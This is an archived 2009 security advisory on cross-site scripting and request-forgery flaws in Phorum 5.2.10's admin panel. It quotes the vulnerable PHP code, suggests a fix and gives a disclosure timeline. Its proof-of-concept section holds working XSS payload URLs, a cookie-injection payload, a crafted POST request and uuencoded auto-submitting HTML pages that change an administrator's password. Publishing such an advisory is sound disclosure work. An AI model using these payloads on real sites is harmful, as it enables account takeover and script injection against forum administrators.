[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Phorum < 5.2.10 Cross-Site Scripting/Request Forgery



#=cicatriz 
<c1c4tr1z@xxxxxxxxxxxxxxx>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
                                     /)           /)     /)                   
                        _ _  _______(/ ________  // _   (/_ _       _____  _  
                        (/__(_)(_)(_(_(_)(_)    (/_(_(_/_) /_)_ o  (_)/ (_(_/_
                                                                         .-/  
#=Phorum < 5.2.10 Cross-Site Scripting/Request 
Forgery=#=~~~~~~~~~~~~~~~(_/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Advisory & Vulnerability 
Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

        Title: Phorum < 5.2.10 Cross-Site Scripting/Request Forgery
        Advisory ID: VUDO-2009-1504
        Advisory URL: http://research.voodoo-labs.org/advisories/4
        Date founded: 10-4-2009
        Vendors contacted: Phorum
        Class: Multiple Vulnerabilities
        Remotely Exploitable: Yes
        Localy Exploitable: No
        Exploit/PoC Available: Yes
        Policy: Full Disclosure Policy (RFPolicy) v2.0

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Tested & Vulnerable 
packages=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

        [+] Phorum 5.2.10
        [+] Phorum 5.2-dev

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Solutions and 
Workarounds=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Phorum released some important fixes for the Cross-Site Scripting 
vulnerabilities [1]

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Technical 
Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Phorum [2] suffers from a series of Cross-Site Scripting (XSS) and Cross-Site 
Request Forgery (CSRF)
vulnerabilities, trough the admin panel and the "file uploading" section (with 
an XML file but it only works
if you are using Mozilla Firefox as browser and a crafted XUL file). Some other 
vulnerabilities:
 
[*] Cross-Site Scripting (XSS):
        
        The most simple XSS can be executed easily and the error can be found 
on the file
        "include/admin/banlist.php":
        
        +++include/admin/banlist.php @@ 88:104
            88      if($_GET["curr"] && $_GET["delete"]){
            89  
            90          ?>
            91  
            92          <div class="PhorumInfoMessage">
            93              Are you sure you want to delete this entry?
            94              <form action="<?php echo $PHORUM["admin_http_path"] 
?>" method="post">
            95                  <input type="hidden" name="module" value="<?php 
echo $module; ?>" />
XXX         96                  <input type="hidden" name="curr" value="<?php 
echo $_GET['curr']; ?>" />
            97                  <input type="hidden" name="delete" value="1" />
            98                  <input type="submit" name="confirm" value="Yes" 
/>&nbsp;<input type="submit" 
            name="confirm" value="No" />
            99              </form>
           100          </div>
           101  
           102          <?php
           103  
           104      } else {
        ---include/admin/banlist.php
        
        The same security flaw can be found in the file 
"include/admin/banlist.php", line 94, and can be also
        exploited with a single GET petition.
        Here's another XSS attack but more difficult to be exploited, because 
you need to modify the user's
        cookies to store the vector and redirect him to the "versioncheck.php" 
file:
        
        +++versioncheck.php @@ 79:83
            79    <?php if ($upgrade_available) { ?>
            80      <div class="notify_upgrade">
XXX         81        <a target="_top" href="admin.php?module=version">New 
Phorum version <?php print 
                $upgrade_available ?> available!</a>
            82      </div>
            83    <?php } else { ?>
        ---versioncheck.php

        There's another XSS on the file "include/admin/users.php" but it can 
only be exploited from a POST 
        request on this lines:
        
        +++include/admin/users.php @@ 87:93
            87          //check for a valid email
            88          if (!empty($_POST["email"])) {
            89              include('./include/email_functions.php');
            90              $valid_email = phorum_valid_email($_POST["email"]);
            91              if ($valid_email !== true)
XXX         92                  $error = "The email \"$_POST[email]\" is not 
valid!";
            93          }
        ---include/admin/users.php
        
        Also the line 82, on the same file, its vulnerable to the same attack.
        In the users.php file there's another vulnerable line, trough the 
request Referer parameter or 
        $_POST['referrer'].
        
        +++include/admin/users.php @@ 52:59
            52  if (isset($_POST['referrer'])) {
XXX         53      $referrer = $_POST['referrer'];
            54      unset($_POST['referrer']);
            55  } elseif (isset($_SERVER['HTTP_REFERER'])) {
XXX         56      $referrer = $_SERVER['HTTP_REFERER'];
            57  } else {
            58      $rererrer = "{$PHORUM["admin_http_path"]}?module=users";
            59  }
        ---include/admin/users.php
        +++include/admin/users.php @@ 659:661
           659  
XXX        660      $frm->hidden("referrer", $referrer);
           661  
        ---include/admin/users.php

        A way to fix this can be done using htmlspecialchars() or 
htmlentities() and any other function that 
        does a sanity check, i.e:
        
        +++
        <input type="hidden" name="curr" value="<?php echo 
htmlentities($_GET['curr'], ENT_QUOTES,
        'UTF-8'); ?>" />
        ---
        
        
[*] Cross-Site Request Forgery (CSRF):
        
        All the forms on the admin panel it's vulnerable to CSRF because of the 
lack of security tokens to
        check if the administrator really wants to do those actions. Without a 
token an attacker can create
        a new user as admin or change the administrator passwords and other 
personal data. Another type of
        action can be done with a simple bbcode [img] tag. When the 
administrator see the [img] tag with a 
        special crafted URL, an action, such as delete a topic, could be 
executed.
        A more dangerous attack can lead to JavaScript execution.
        
        
[3] Other vulnerabilities were founded on this application. (WHK)

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Proof of 
Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[*] Cross-Site Scripting (XSS):

        +++
        
http://localhost/phorum-5.2.10/admin.php?module=banlist&curr=1";><img/src/onerror="alert('voodoo');
        &delete=1
        ---
        
        +++
        
http://www.victim.com/phorum-5.2.10/admin.php?module=badwords&curr=1";><img/src/onerror="
        alert('voodoo');&delete=1
        ---
        
        +++
        javascript:with(document)cookie="phorum_upgrade_available=
        <iframe/src='javascript:alert(/voodoo/.source)'>",
        location="http://www.victim.com/phorum-5.2.10/versioncheck.php";;
        ---
        
        +++
        POST /phorum-5.2.10/admin.php HTTP/1.1 
        
        
module=users&referrer=http%3A%2F%2Fwww.victim.com%2Fphorum-5.2.10%2Fadmin.php%3Fmodule%3Dusers
        &addUser=1&username=xss&real_name=xss&
        
email=%3Ciframe%2Fsrc%3D%22javascript%3Aalert%28%27voodoo%27%29%3B%22%3E&password1=xss&password2=xss
        &admin=0
        ---
        
[*] Cross-Site Request Forgery (CSRF):

        Other CSRF proof-of-concept exploits can be found on:
                [*] http://research.voodoo-labs.org/code/exploits/phorum/5.2.10/
                
        If the administrator see this special crafted HTML page, his password 
will be changed to a string 
        specified by the attacker. (uuencoded)
        
        +++
        begin 644 attack.html
        M/&AT;6P^"CQB;V1Y/@H)/&@Q/E!H;W)U;2`U+C(N,3`@(F5D:71U<V5R(B!#
        M4U)&(&%T=&%C:SPO:#$^"@D\9F]R;2!A8W1I;VX](FAT='`Z+R]W=W<N=FEC
        M=&EM+F-O;2]P:&]R=6TM-2XR+C$P+V%D;6EN+G!H<"(@;65T:&]D/2)03U-4
        M(CX*"0D\:6YP=70@;F%M93TB;6]D=6QE(B!V86QU93TB=7-E<G,B('1Y<&4]
        M(FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](G-E8W1I;VXB('9A;'5E/2)M86EN
        M(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)R969E<G)E<B(@=F%L
        M=64](FAT='`Z+R]W=W<N=FEC=&EM+F-O;2]P:&]R=6TM-2XR+C$P+V%D;6EN
        M+G!H<"(@='EP93TB:&ED9&5N(CX*"0D\:6YP=70@;F%M93TB=7-E<E]I9"(@
        M=F%L=64](C$B('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](G)E86Q?
        M;F%M92(@<VEZ93TB-3`B('9A;'5E/2(B('1Y<&4](FAI9&1E;B(^"@D)/&EN
        M<'5T(&YA;64](F5M86EL(B!S:7IE/2(U,"(@=F%L=64](F%D;6EN0'=E8FUA
        M<W1E<BYC;VTB('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](G!A<W-W
        M;W)D,2(@=F%L=64](G!W;F5D(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N
        M86UE/2)P87-S=V]R9#(B('9A;'5E/2)P=VYE9"(@='EP93TB:&ED9&5N(CX*
        M"0D\=&5X=&%R96$@<W1Y;&4](G=I9'1H.C!P>#MH96EG:'0Z,'!X.V)O<F1E
        M<CHP<'@[(B!N86UE/2)S:6=N871U<F4B(&-O;',](C,P(B!R;W=S/2(U(CYV
        M;V]D;V\\+W1E>'1A<F5A/@H)"3QS96QE8W0@<W1Y;&4](G=I9'1H.C!P>#MH
        M96EG:'0Z,'!X.V)O<F1E<CHP<'@[(B!N86UE/2)A8W1I=F4B/@H)"0D\;W!T
        M:6]N('9A;'5E/2(P(CY.;SPO;W!T:6]N/@H)"0D\;W!T:6]N('9A;'5E/2(Q
        M(B!S96QE8W1E9#TB<V5L96-T960B/EEE<SPO;W!T:6]N/@H)"3PO<V5L96-T
        M/@H)"3QS96QE8W0@<W1Y;&4](G=I9'1H.C!P>#MH96EG:'0Z,'!X.V)O<F1E
        M<CHP<'@[(B!N86UE/2)A9&UI;B(^"@D)"3QO<'1I;VX@=F%L=64](C`B/DYO
        M/"]O<'1I;VX^"@D)"3QO<'1I;VX@=F%L=64](C$B('-E;&5C=&5D/2)S96QE
        M8W1E9"(^665S/"]O<'1I;VX^"@D)/"]S96QE8W0^"@D)/&EN<'5T('9A;'5E
        M/2)5<&1A=&4B(&-L87-S/2)I;G!U="UF;W)M+7-U8FUI="(@='EP93TB:&ED
        M9&5N(CX*"3PO9F]R;3X*"3QS8W)I<'0^<V5T5&EM96]U="AF=6YC=&EO;B@I
        M>V1O8W5M96YT+F9O<FUS6S!=+G-U8FUI="@I.WTL,'@U,#`I.SPO<V-R:7!T
        3/@H\+V)O9'D^"CPO:'1M;#X*"@``
        `
        end
        ---
        
[*] CSRF + XSS:

        This is another way to exploit those two types of attacks (XSS and 
CSRF). If the administrator see
        this page a new folder will be created and the name is going to be a 
special HTML tag with a
        JavaScript script. (uuencoded)
        
        +++
        begin 644 attack.html
        M/&AT;6P^"CQB;V1Y/@H)/&@Q/E!H;W)U;2`U+C(N,3`@(FYE=V9O;&1E<B(@
        M0U-21BM84U,@871T86-K/"]H,3X*"3QF;W)M(&%C=&EO;CTB:'1T<#HO+W=W
        M=RYV:6-T:6TN8V]M+W!H;W)U;2TU+C(N,3`O861M:6XN<&AP(B!M971H;V0]
        M(E!/4U0B/@H)"3QI;G!U="!T>7!E/2)H:61D96XB(&YA;64](F9O;&1E<E]F
        M;&%G(B!V86QU93TB,2(^"@D)/&EN<'5T('1Y<&4](FAI9&1E;B(@;F%M93TB
        M;6]D=6QE(B!V86QU93TB;F5W9F]L9&5R(CX*"0D\:6YP=70@='EP93TB:&ED
        M9&5N(B!N86UE/2)N86UE(B!S:7IE/2(S,"(@=F%L=64](B9L=#MI9G)A;64O
        M<W)C/2=J879A<V-R:7!T.F%L97)T*"]V;V]D;V\O+G-O=7)C92D[)R9G=#LB
        M(#X\+W1D/@H)"3QT97AT87)E82!N86UE/2)D97-C<FEP=&EO;B(@8V]L<STB
        M-C`B(')O=W,](C$P(B!S='EL93TB=VED=&@Z,'!X.VAE:6=H=#HP<'@[8F]R
        M9&5R.C!P>#LB/CPO=&5X=&%R96$^/"]T9#X*"0D\<V5L96-T('-T>6QE/2)W
        M:61T:#HP<'@[:&5I9VAT.C!P>#MB;W)D97(Z,'!X.R(@;F%M93TB<&%R96YT
        M7VED(B`^"@D)"3QO<'1I;VX@=F%L=64](C$B('-E;&5C=&5D/2)S96QE8W1E
        M9"(^+2U.;VYE+2T\+V]P=&EO;CX*"0D\+W-E;&5C=#X*"0D\<V5L96-T('-T
        M>6QE/2)W:61T:#HP<'@[:&5I9VAT.C!P>#MB;W)D97(Z,'!X.R(@;F%M93TB
        M86-T:79E(B`^"@D)"3QO<'1I;VX@=F%L=64](C`B/DYO/"]O<'1I;VX^"@D)
        M"3QO<'1I;VX@=F%L=64](C$B('-E;&5C=&5D/2)S96QE8W1E9"(^665S/"]O
        M<'1I;VX^"@D)/"]S96QE8W0^"@D)/'-E;&5C="!S='EL93TB=VED=&@Z,'!X
        M.VAE:6=H=#HP<'@[8F]R9&5R.C!P>#LB(&YA;64](G1E;7!L871E(B`^"@D)
        M"3QO<'1I;VX@=F%L=64](F5M97)A;&0B('-E;&5C=&5D/2)S96QE8W1E9"(^
        M4&AO<G5M($5M97)A;&0@5&5M<&QA=&4@,2XP/"]O<'1I;VX^"@D)"3QO<'1I
        M;VX@=F%L=64](F-L87-S:6,B/D-L87-S:6,@4&AO<G5M(%1E;7!L871E(#`N
        M-#PO;W!T:6]N/@H)"0D\;W!T:6]N('9A;'5E/2)L:6=H='=E:6=H="(^4&AO
        M<G5M($QI9VAT=V5I9VAT(%1E;7!L871E(#$N,#PO;W!T:6]N/@H)"3PO<V5L
        M96-T/@H)"3QS96QE8W0@<W1Y;&4](G=I9'1H.C!P>#MH96EG:'0Z,'!X.V)O
        M<F1E<CHP<'@[(B!N86UE/2)L86YG=6%G92(@/@H)"0D\;W!T:6]N('9A;'5E
        M/2)E;F=L:7-H(CY%;F=L:7-H("A!;65R:6-A;BD\+V]P=&EO;CX*"0D\+W-E
        M;&5C=#X*"0D\:6YP=70@='EP93TB:&ED9&5N(B!I9#TB861M:6Y?8VAE8VMB
        M;WA?,2(@;F%M93TB=G)O;W0B('9A;'5E/2(Q(CX*"0D\:6YP=70@='EP93TB
        M:&ED9&5N(B!V86QU93TB4W5B;6ET(B!C;&%S<STB:6YP=70M9F]R;2US=6)M
        M:70B/@H)/"]F;W)M/@H)/'-C<FEP=#YS9714:6UE;W5T*&9U;F-T:6]N*"E[
        M9&]C=6UE;G0N9F]R;7-;,%TN<W5B;6ET*"D[?2PP>#4P,"D[/"]S8W)I<'0^
        2"CPO8F]D>3X*/"]H=&UL/@H*
        `
        end
        ---

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Reporting 
Timeline=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

        [*] 10-04-2009: Bugs discovered.
        [*] 10-04-2009: Voodoo contacted the vendor (advisory draft included).
        [*] 13-04-2009: The vendor released fixes for Cross-Site Scripting 
vulnerabilities.
        [*] 15-04-2009: Advisory VUDO-2009-1504 published.

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=References=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

        [1] http://trac.phorum.org/changeset/4009
        [2] http://www.phorum.org/
        [3] 
http://foro.elhacker.net/nivel_web/multiples_fallas_en_phorum_5210-t248300.0.html

#=cicatriz 
<c1c4tr1z@xxxxxxxxxxxxxxx>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
#=mié 15 abr 2009 
ART=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#